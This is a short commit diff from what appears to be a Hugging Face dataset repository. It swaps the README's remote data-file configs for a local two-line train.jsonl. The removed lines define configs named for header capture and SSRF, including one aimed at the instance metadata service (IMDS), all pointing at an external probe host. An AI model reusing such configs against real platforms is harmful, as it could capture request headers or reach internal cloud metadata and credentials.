test local data file mechanism
Browse files- README.md +3 -15
- data/train.jsonl +2 -0
README.md
CHANGED
|
@@ -1,22 +1,10 @@
|
|
| 1 |
---
|
| 2 |
license: mit
|
| 3 |
configs:
|
| 4 |
-
- config_name:
|
| 5 |
data_files:
|
| 6 |
- split: train
|
| 7 |
-
path: "
|
| 8 |
-
- config_name: worker_headers_capture2
|
| 9 |
-
data_files:
|
| 10 |
-
- split: train
|
| 11 |
-
path: "https://xitro-env-probe.hf.space/capture/train.jsonl"
|
| 12 |
-
- config_name: internal_ssrf_redirect_json
|
| 13 |
-
data_files:
|
| 14 |
-
- split: train
|
| 15 |
-
path: "https://xitro-env-probe.hf.space/data/config.json"
|
| 16 |
-
- config_name: internal_ssrf_imds
|
| 17 |
-
data_files:
|
| 18 |
-
- split: train
|
| 19 |
-
path: "https://xitro-env-probe.hf.space/data/imds.txt"
|
| 20 |
---
|
| 21 |
|
| 22 |
-
#
|
|
|
|
| 1 |
---
|
| 2 |
license: mit
|
| 3 |
configs:
|
| 4 |
+
- config_name: default
|
| 5 |
data_files:
|
| 6 |
- split: train
|
| 7 |
+
path: "data/train.jsonl"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 8 |
---
|
| 9 |
|
| 10 |
+
# Test dataset with local data file
|
data/train.jsonl
ADDED
|
@@ -0,0 +1,2 @@
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{"text": "hello world", "label": 0}
|
| 2 |
+
{"text": "test data", "label": 1}
|